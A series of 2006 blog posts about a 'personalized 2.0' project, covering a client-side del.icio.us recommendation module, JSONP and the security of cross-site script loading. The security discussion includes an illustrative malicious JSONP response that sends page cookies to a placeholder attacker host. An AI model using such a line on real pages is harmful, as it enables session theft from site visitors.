Wednesday, February 22, 2006

Why Is the del.icio.us Recommendation Engine Not Personalized 2.0?

First, you have to tell your del.icio.us ID to the site you are visiting. In principle, this shouldn't be necessary, because what the site needs is your recent tagging information, not your ID. Unfortunately, to get your bookmark information, the site owner has to know your del.icio.us ID; this follows from the design of del.icio.us's feed interface. In general, forcing visitors to reveal a unique ID is not preferable from a privacy standpoint.

Second, this module doesn't consider the case where identity information is access controlled in the first place. Del.icio.us bookmarks are clearly identity information, but they are not restricted; they are always published to the general public. In order to deal with all identity-aware web services, we have to consider the case where services are access controlled.

These are not the only issues in personalized 2.0 services. If I had the time, I could pick up many other issues to be solved.

Del.icio.us Recommendation Engine

While researching del.icio.us's recent native support of JSONP, an interesting idea hit me and fired up my imagination. I devoted the last few days to this development, and finally I created an attractive script module. I call it the "Del.icio.us Recommendation Engine".

The "Del.icio.us Recommendation Engine" generates a list of recommendation links extracted from the site owner's bookmarks archived in del.icio.us. If you tell the site your del.icio.us ID, you get the site owner's bookmarks as recommendations. While your recommendation list is being created, your recent del.icio.us posts and their associated tags are automatically used as your preference information.

It is cool because we don't need any server infrastructure for generating the recommendation list. The entire generation process is done in client-side JavaScript. JSON (or JSONP) and On-Demand JavaScript techniques are used to get del.icio.us posts.
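The matching step can be sketched as a pure client-side function. This is only an illustration of the tag-overlap idea, not the actual module: the function name `scoreBookmarks` is my own, and the `t` (tags) and `d` (title) field names are assumed from the del.icio.us JSON feed format.

```javascript
// Sketch: score the site owner's bookmarks by how many tags they
// share with the visitor's recent del.icio.us tags.
function scoreBookmarks(ownerPosts, visitorPosts) {
  // Collect the visitor's recent tags into a lookup table.
  var visitorTags = {};
  for (var i = 0; i < visitorPosts.length; i++) {
    var tags = visitorPosts[i].t || []; // "t" assumed to hold the tag array
    for (var j = 0; j < tags.length; j++) {
      visitorTags[tags[j]] = true;
    }
  }
  // Score each owner bookmark by the number of shared tags.
  var scored = [];
  for (var k = 0; k < ownerPosts.length; k++) {
    var score = 0;
    var ownerTags = ownerPosts[k].t || [];
    for (var m = 0; m < ownerTags.length; m++) {
      if (visitorTags[ownerTags[m]]) score++;
    }
    if (score > 0) scored.push({ post: ownerPosts[k], score: score });
  }
  // Highest overlap first.
  scored.sort(function (a, b) { return b.score - a.score; });
  return scored;
}
```

The real module would feed both post lists in from the JSONP feed and then render the sorted result as a link list.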

Seeing is believing. Please take a look.

I think it is an interesting module, but I don't think it is the final achievement of my personalized 2.0 project. Yes, this module does a kind of personalization for visitors, but the techniques used in it cannot be applied in many cases. I think there are many issues to be solved before it can become a generic personalized web 2.0 service solution.

Anyway, I created a "personalized 2.0"-like service module. It's totally fun. Enjoy yourself.

Thursday, February 16, 2006

Del.icio.us is Now Doing JSONP, or Callback Support

I don't know when del.icio.us began its JSON service, but the JSON interface for their bookmark information used to be only a static one: through a static 'Delicious' JavaScript object we could get posts. So it apparently did not support parallel queries (they would destroy each other's results), and it did not consider name conflicts.

But while testing with my JSON with Padding Tester (JSONP Tester), I found that they have implemented a callback function parameter, like Yahoo.

Check this out.

http://del.icio.us/feeds/json/stomita?callback=JsonUtil.responseCallbacks%5B0%5D


It is not mentioned on the official help page, and I couldn't find any articles about this new feature. I'm not sure when they implemented it (it may be old).

Anyway, I have included a del.icio.us call in the JSONP Tester page.
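For reference, calling a JSONP feed like this from a page is just dynamic script-tag insertion. The helper names below (`buildJsonpUrl`, `loadJsonp`, `handlePosts`) are my own illustrative names, and the `u`/`d` field names are assumed from the feed format:

```javascript
// Build the feed URL with the callback parameter, escaping characters
// like [ and ] (as in JsonUtil.responseCallbacks[0] above).
function buildJsonpUrl(feedUrl, callbackName) {
  return feedUrl + "?callback=" + encodeURIComponent(callbackName);
}

// Browser-only part: append a <script> element so the browser fetches
// and executes the wrapped response, which calls back into our page.
function loadJsonp(feedUrl, callbackName) {
  var script = document.createElement("script");
  script.type = "text/javascript";
  script.src = buildJsonpUrl(feedUrl, callbackName);
  document.getElementsByTagName("head")[0].appendChild(script);
}

// The callback must be reachable under the global name we passed.
function handlePosts(posts) {
  for (var i = 0; i < posts.length; i++) {
    // posts[i].u / posts[i].d would hold each bookmark's url and title
  }
}

// In a browser:
// loadJsonp("http://del.icio.us/feeds/json/stomita", "handlePosts");
```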



JSONP Service and Security

Before talking about shared services, I have to clarify what issues (or concerns) are currently discussed about JSONP services (maybe not discussed much, because there are fewer such services than usual REST XML or SOAP web services). In particular, I'm going to focus on security concerns. Because XMLHttpRequest itself doesn't allow requests to any site other than the one the original HTML came from (the same-origin policy), there might be the same or similar concerns in JSONP services.

Let's say Site Y is a JSONP service site (like Yahoo), Site M is your JSONP mashup site, and User u is a visitor to Site M. Site O is a simple web service provider unrelated to these services, but a possible attacker's target.

(Note that these are only my guesses.)


If M is malicious, can M steal u's identity information held in Y?



M cannot steal it without Y's cooperation. If Y has an unrestricted JSONP interface to access u's identity information, M can. If there is no consent from u, Y should be responsible for the unintended usage of u's identity information.


If Y is malicious, can Y do bad things (information theft, session hijacking) to M?



Absolutely, Y can. The loaded JSONP service does not always have to provide a JSON object; it is nothing other than JavaScript, and the code itself is entirely under Y's control. Loaded code is automatically executed without any validation (this is a key point of JSONP), and its execution privilege becomes that of Site M. So M has to trust Y as long as M is using Y's service.
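To make this concrete, here is an illustration of why the mashup page cannot defend itself. The callback name `showResults` and the URLs are made up; the malicious response is shown as a string only, never executed:

```javascript
// A well-behaved JSONP provider returns only a callback invocation:
var benignResponse = 'showResults({"count": 2});';

// But the response is just script text, so a malicious provider can
// return anything, e.g. code that ships the page's cookies elsewhere
// (shown here as a string for illustration, NOT executed):
var maliciousResponse =
  'showResults({"count": 2});' +
  'new Image().src = "http://evil.example/steal?c=" + document.cookie;';

// The mashup page cannot inspect the code before it runs; the implicit
// <script> execution (simulated here with eval) runs whatever arrived,
// with the privileges of the mashup page itself.
var received = null;
function showResults(data) { received = data; }
eval(benignResponse);
```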


If Y suddenly becomes malicious and the loaded code harms M, who is responsible?



Of course, Y is basically responsible. If what was stolen is u's identity information held in M, M should also be responsible (for the unintended usage of u's identity information).


If Y is malicious, can Y attack O?



Yes; for example, by sending a huge number of requests to O. And, similar to a DDoS attack, the attacking context becomes that of User u. But this is not special to JSONP services, because any malicious site can do the same. The main concern here is trust. If User u trusted Site M without knowing that M was using Y's service (u might not trust Y), then M was responsible for explaining in advance that it uses Y's services, because, if notified, u might not have used M's service. M should also bear some responsibility toward Site O.


Can Y steal u's identity information held in Site O?



Basically, no. If there were vulnerabilities in O, it might be yes. If u accepted the usage of cross-domain XMLHttpRequest in some way (a browser setting?), it might also be yes, but that is u's responsibility.


Can Y affect transactions between u and O?



Basically, no. If there were vulnerabilities in O, it might be yes; CSRF might be one of them. O should be responsible for its own vulnerabilities.


Saturday, February 11, 2006

JSON with Padding Tester

Unlike my previous posts, this post doesn't go further into my project's details. Instead, I'd like to show something I have created for my own project so far.

As I posted before, the On-Demand JavaScript and JSON combination is really nice, and a protocol called JSONP (JSON with Padding) is a good implementation of it (Yahoo is now doing it in a similar way!). However, while XMLHttpRequest can be tested and monitored with some tools (like FireBug), JSONP seemingly cannot.

So I created a tiny testing tool to cover this. With the JSON with Padding Tester, you can test your JSONP service by entering and submitting your service URL. The default input value is pre-filled with the Yahoo Search Web Service URL (with a search keyword of 'google'), and the JSONP URL parameter is set to 'callback' - it can be changed to any other parameter name you prefer - so you can easily check what kind of tool it is.


Thursday, February 09, 2006

Remoting Technique in Personalized 2.0 Services

Since I want to connect to all services around the world, remoting from the web browser is really needed. XMLHttpRequest, which is said to be a key element of Ajax, enables the browser to retrieve data asynchronously from server-side services. Thanks to this capability, we can treat a web browser like a web service client. But for the following reasons, I don't much like to use it.

The most disappointing thing about XMLHttpRequest is that it cannot reach services provided from other domains. This restriction might come from some security or privacy concern. To avoid it, a technique called Cross Domain Proxy is often used. However, the necessity of a server located in the same domain that proxies all of the browser's requests prevents this from scaling.

By the way, XMLHttpRequest is not the only way to get asynchronous data. There is another way for the browser to retrieve service information dynamically - the combination of On-Demand JavaScript and JSON.

JSON is a data format that can be directly parsed by a JavaScript engine. This is done by calling JavaScript's eval() function. For security reasons, eval() is not really recommended for remotely retrieved data, but if the remote service itself is trusted, it is very useful.
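A minimal illustration of this parsing step (the JSON text here is made up for the example):

```javascript
// Parse JSON text with eval(). The outer parentheses make the braces
// parse as an object literal rather than a statement block.
var jsonText = '{"title": "Personalized 2.0", "tags": ["json", "ajax"]}';
var data = eval("(" + jsonText + ")");

// data.title is now "Personalized 2.0" - but note that eval() runs
// ANY code it is given, which is why the source must be trusted.
```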

However, in the On-Demand JavaScript pattern, we don't call eval() ourselves. There are several ways to evaluate JSON data - the del.icio.us JSON feed is one way to include a remotely provided JSON object. The most useful approach, I think, is the idea called JSONP (JSON with Padding). It is something like a protocol between a JavaScript client and a JSON server: the client gives a callback function name in a URL parameter, and the server returns a JavaScript call to that callback function with the JSON data as its argument. This idea is also seen in Yahoo Web Services with JSON output, and it works well.
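The server side of this protocol amounts to a one-line wrapping step. This is a sketch under my own naming (`wrapJsonp` is illustrative, not any service's real API):

```javascript
// Take the callback name from the "callback" url parameter and wrap
// the JSON payload in a call to it.
function wrapJsonp(callbackName, jsonText) {
  if (!callbackName) {
    return jsonText; // no callback requested: return plain JSON
  }
  return callbackName + "(" + jsonText + ");";
}

// For a request like ?callback=handlePosts the response body becomes
//   handlePosts({"posts": [...]});
// which the browser executes, handing the data to the client's function.
```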

One really good thing about On-Demand JavaScript and JSON, compared with XMLHttpRequest and a Cross Domain Proxy, is that they don't have the complexity of authenticating the user. Almost all web applications now maintain a user's session with cookies, which are automatically sent with each URL request. Because an On-Demand JavaScript loading request is exactly the same as a usual browser request, a JSON server can identify the requesting user by the cookies previously given.

On the other hand, a Cross Domain Proxy can request remote resources, but the actual requester is the local server, not the browser, so no cookies are available. Because authentication is always needed for access control or for personalizing service information, the local server has to keep the end user's credentials for the remote service.

For these reasons, I adopt On-Demand JavaScript and JSON calls as my remoting technique. It can be regarded as a user-centric approach. Anyway, my true interest is in sharing personalized or individual data (that is, identity-aware data) from anywhere in the world. The next post is going to be about that.



Wednesday, February 08, 2006

Blogging about "Personalized 2.0", now started

Influenced by the recent attractive movement known as "web 2.0", I have decided to start a project of new cutting-edge software development and to blog about it.

Although my native tongue is not English - I'm Japanese, living in Japan - it is worth writing this blog in English, because there seem to be enormous numbers of folks interested in recent web movements, and my ideas may attract them - at least I hope so.

Actually, I'm now working at an enterprise software company, where I'm involved in some web application software design - especially application security, identity management, and role-based access control. In enterprise environments these days, almost all companies are using Java or J2EE (except for MS shops), but most web developers seem to be using scripting languages like PHP, Ruby, or Perl. I'm not so familiar with these server-side scripting languages, but that doesn't have much impact on my development. Everything required for developing a web 2.0 software service is common, standards-based technology - HTML, DOM, XML, and JavaScript.

As my blog title shows, my initial purpose in starting this blog and development project is to bring a "personalized" feature to web 2.0 services. So far we have seen many web 2.0 services, but almost all of them are public services, not targeted at individuals. Of course, they often have user accounts, and they can maintain their data through these end users' contributions, but the information retrieved from these services is always public - that is, not access controlled.

Some might say that this users' contribution to public information is the main web 2.0 feature and is therefore valuable, but I think it limits the opportunity of web 2.0. Imagine a mashup service which combines your address book records with Google Maps. Such a service is attractive and seems possible, but it requires the mashup site to collect and keep your address book information. This implies that services dealing with personal data, like address books or schedule information, cannot be delivered as easily as the Amazon book search service, the Yahoo web search service, or Google Maps - the representative mashup ingredients.

Like flickr or evdb (eventful), there are services which have a web API to access their personal data. But every successful mashup service using flickr is using the public service API, not the personalized one. If some service provider wanted to build a personalized flickr mashup, there would be security and privacy concerns in handing over credentials. I absolutely don't want to give my flickr password to some unknown, fishy site, even if it claims to provide a great mashup service using flickr. I think this is one of the reasons preventing identity-aware web 2.0 services from spreading.

Another considerable reason is that they only have XML web service APIs. Making XML calls requires some server infrastructure: all requests are processed or proxied by a server, so the service doesn't scale if the given resources are poor. Compare this with a mashup using Google Maps - there is no need to set up CGI; a static web site is enough!

With these points in mind, I've started a project I'm calling "personalized 2.0". In this project, I will choose a user-centric approach, which may resemble the approach called "identity 2.0". Later posts will explain more details.
